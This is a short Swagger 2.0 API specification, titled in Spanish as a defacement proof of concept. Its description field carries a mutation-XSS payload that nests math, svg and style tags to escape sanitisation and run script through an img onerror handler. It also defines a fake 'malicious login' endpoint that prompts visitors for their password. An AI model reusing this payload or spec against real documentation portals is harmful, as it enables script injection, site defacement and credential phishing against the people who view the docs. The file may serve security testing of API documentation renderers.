swagger: '2.0'
info:
  title: Prueba de Concepto - Defacement
  description: |
      <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">
  version: testing
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /MetodoMalicioso:
    get:
      parameters: 
        - description: Por favor ingrese su contraseña
          format: int64
          in: path
          name: contraseña
          required: true
          type: string
      responses:
        '200':
          description: Login exitoso
      tags:
        - ingresarContraseña
      operationId: login
      summary: login malicioso
